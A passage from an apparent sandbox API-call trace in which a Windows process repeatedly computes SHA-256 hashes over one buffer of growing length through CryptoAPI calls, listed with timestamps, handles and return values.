pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.557] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70f20 [0183.557] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e70f20, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70f20, pdwDataLen=0xcdfdc) returned 1 [0183.557] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.557] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0183.557] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.557] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.557] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0x700, dwFlags=0x0) returned 1 [0183.557] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.557] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71250 [0183.557] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e71250, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71250, pdwDataLen=0xcdfdc) returned 1 [0183.557] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.557] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.557] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.558] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.558] CryptHashData (hHash=0x3396f5f0, pbData=0x32e786e0, dwDataLen=0x720, dwFlags=0x0) returned 1 [0183.558] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.558] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e713a0 [0183.558] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e713a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e713a0, pdwDataLen=0xcdfdc) returned 1 [0183.558] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.558] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.558] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.559] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.559] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x740, dwFlags=0x0) returned 1 [0183.559] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71280 [0183.559] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71280, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71280, pdwDataLen=0xcdfdc) returned 1 [0183.559] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.559] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.559] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0183.559] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.559] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x760, dwFlags=0x0) returned 1 [0183.559] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71580 [0183.559] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71580, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71580, pdwDataLen=0xcdfdc) returned 1 [0183.559] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.559] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0183.559] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.560] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.560] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x780, dwFlags=0x0) returned 1 [0183.560] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e712e0 [0183.560] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e712e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e712e0, pdwDataLen=0xcdfdc) returned 1 [0183.560] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.560] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.560] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.561] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.561] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0183.561] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.561] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e713d0 [0183.561] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e713d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e713d0, pdwDataLen=0xcdfdc) returned 1 [0183.561] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.561] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.561] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822fd0) returned 1 [0183.561] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.561] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0183.562] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71310 [0183.562] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71310, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71310, pdwDataLen=0xcdfdc) returned 1 [0183.562] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.562] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0183.562] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.562] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.562] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0183.562] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71640 [0183.562] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71640, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71640, pdwDataLen=0xcdfdc) returned 1 [0183.562] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.562] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.562] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0183.563] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.563] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x800, dwFlags=0x0) returned 1 [0183.563] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e712b0 [0183.563] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e712b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e712b0, pdwDataLen=0xcdfdc) returned 1 [0183.563] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.563] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0183.563] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.564] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.564] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x820, dwFlags=0x0) returned 1 [0183.564] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71040 [0183.564] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e71040, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71040, pdwDataLen=0xcdfdc) returned 1 [0183.564] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.564] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.564] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0183.565] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.565] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x840, dwFlags=0x0) returned 1 [0183.565] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.565] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e711c0 [0183.565] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e711c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e711c0, pdwDataLen=0xcdfdc) returned 1 [0183.565] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.565] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0183.565] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.565] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.565] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x860, dwFlags=0x0) returned 1 [0183.565] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.565] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71370 [0183.565] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71370, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71370, pdwDataLen=0xcdfdc) returned 1 [0183.566] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.566] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.566] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.566] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.566] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x880, dwFlags=0x0) returned 1 [0183.566] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.566] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71460 [0183.566] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e71460, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71460, pdwDataLen=0xcdfdc) returned 1 [0183.566] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.566] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.566] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0183.567] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.567] CryptHashData (hHash=0x3396eb70, pbData=0x32e786e0, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0183.567] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70e90 [0183.567] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32e70e90, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70e90, pdwDataLen=0xcdfdc) returned 1 [0183.567] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0183.567] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0183.567] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.568] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.568] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0183.568] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71670 [0183.568] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e71670, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71670, pdwDataLen=0xcdfdc) returned 1 [0183.568] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.568] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.568] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.568] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.568] CryptHashData (hHash=0x3396ee80, pbData=0x32e786e0, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0183.568] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71400 [0183.568] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32e71400, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71400, pdwDataLen=0xcdfdc) returned 1 [0183.568] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0183.568] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.568] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.569] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.569] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x900, dwFlags=0x0) returned 1 [0183.569] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.569] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71340 [0183.569] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71340, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71340, pdwDataLen=0xcdfdc) returned 1 [0183.569] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.569] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.569] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.570] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.570] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x920, dwFlags=0x0) returned 1 [0183.570] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e715e0 [0183.570] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e715e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e715e0, pdwDataLen=0xcdfdc) returned 1 [0183.570] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.570] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.570] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.570] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.570] CryptHashData (hHash=0x3396f510, pbData=0x32e786e0, dwDataLen=0x940, dwFlags=0x0) returned 1 [0183.570] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e716d0 [0183.571] CryptGetHashParam (in: hHash=0x3396f510, dwParam=0x2, pbData=0x32e716d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e716d0, pdwDataLen=0xcdfdc) returned 1 [0183.571] CryptDestroyHash (hHash=0x3396f510) returned 1 [0183.571] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.571] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.571] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.571] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x960, dwFlags=0x0) returned 1 [0183.571] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.571] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e714f0 [0183.571] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e714f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e714f0, pdwDataLen=0xcdfdc) returned 1 [0183.571] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.571] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.571] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0183.572] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.572] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x980, dwFlags=0x0) returned 1 [0183.572] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.572] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71700 [0183.572] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e71700, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71700, pdwDataLen=0xcdfdc) returned 1 [0183.572] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.572] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0183.572] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0183.573] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.573] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0183.573] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70b60 [0183.573] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e70b60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70b60, pdwDataLen=0xcdfdc) returned 1 [0183.573] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.573] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0183.573] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.573] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.573] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0183.573] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70bc0 [0183.573] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70bc0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70bc0, pdwDataLen=0xcdfdc) returned 1 [0183.573] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.574] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0183.574] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0183.574] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.574] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0183.574] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70bf0 [0183.574] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e70bf0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70bf0, pdwDataLen=0xcdfdc) returned 1 [0183.574] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.574] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0183.574] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.575] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.575] 